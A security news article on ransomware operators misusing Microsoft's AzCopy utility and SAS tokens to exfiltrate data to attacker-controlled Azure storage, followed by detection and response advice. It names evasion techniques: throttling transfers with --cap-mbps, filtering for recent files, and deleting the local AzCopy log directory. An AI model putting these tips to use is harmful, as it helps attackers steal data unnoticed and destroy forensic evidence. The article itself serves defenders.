Ransomware operators are increasingly abusing Microsoft’s trusted Azure data transfer utility, AzCopy, to quietly exfiltrate sensitive data before encryption, turning a routine cloud migration tool into a stealthy theft channel.
Instead of relying on obviously malicious tools like Rclone or MegaSync, threat actors are pivoting to native, administrator-approved cloud utilities to blend into normal IT operations and evade traditional detection.
AzCopy is a command-line utility designed to move large volumes of data to and from Azure Storage, commonly used by enterprises for backup, migration, and large-scale data operations.
It is distributed as a standalone executable, widely trusted in corporate environments, and rarely blocked or tightly monitored by EDR solutions, which makes it attractive for “living-off-the-land” style exfiltration.
Ransomware groups such as BianLian and Rhysida have been observed using AzCopy and Azure Storage Explorer to bulk-upload stolen files from breached networks into attacker-controlled Azure Blob storage, treating Microsoft’s cloud as their exfiltration staging ground.
Varonis Threat Labs forensic unit has uncovered ransomware operators using a trusted Azure utility, AzCopy, as a data exfiltration tool.
Attackers typically obtain valid Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens to access storage accounts without interactive logins.
AzCopy’s New Role in Cyberattacks
A SAS URL effectively embeds all required permissions, time windows, and target containers, allowing a single AzCopy command to stream large datasets straight into an external blob container.
To avoid triggering network-spike alerts, adversaries can use the –cap-mbps flag to intentionally throttle transfer throughput, keeping traffic volumes stable and less suspicious on monitoring dashboards.
They can also restrict which files are copied using include/exclude patterns and time-based filters similar to –include-after, focusing on recent, high-value documents while minimizing noise.
What makes this technique especially dangerous is that the destination is a fully legitimate cloud provider and the channel is standard HTTPS to domains like *.blob.core.windows.net, which are often broadly allowed through firewalls and proxies.
In some real-world incidents, AzCopy-driven exfiltration went completely undetected by endpoint security tools, leaving it to specialized data security platforms and forensic analysis to reconstruct what was stolen.
Even when Azure logging is enabled, threat actors may attempt to cover their tracks by deleting the local %USERPROFILE%\.azcopy logging directory after completing transfers, removing a key source of evidence for investigators.
Traditional detection strategies that focus on suspicious third-party exfiltration tools leave a blind spot when attackers adopt native cloud utilities and sanctioned admin workflows.
Security teams must be prepared to investigate “odd but legitimate” scenarios, such as a 3 a.m. AzCopy job running under a backup or service account that suddenly accesses far more data than usual.
A data-centric security strategy is essential: organizations should map where sensitive data lives, who can access it, and what normal access and movement patterns look like so that deviations like a reporting account suddenly reading hundreds of thousands of files generate high-fidelity alerts.
Ransomware Campaigns Leveraging AzCopy
User and Entity Behavior Analytics (UEBA) can flag abnormal file access and AzCopy usage by service or privileged accounts, surfacing early signs of compromise before encryption begins.
Network monitoring should restrict direct internet access from servers to only known update and security endpoints, and connections to Azure Blob endpoints from systems that normally do not interact with cloud storage should be scrutinized.
Application control policies can further reduce risk by tightly scoping where AzCopy is allowed to run and under which accounts, ensuring that only specific, approved hosts and service identities can execute the utility.
Incident response plans should explicitly address cloud-based exfiltration scenarios, including how to quickly revoke SAS tokens, rotate keys, isolate affected systems, and coordinate takedown or abuse reports with cloud providers while accepting that stolen data may already be replicated or backed up elsewhere.
As attackers increasingly weaponize legitimate cloud tools like AzCopy, organizations that fail to monitor their own trusted utilities risk letting their security stack “bless” the very traffic that delivers sensitive data into ransomware operators’ hands.
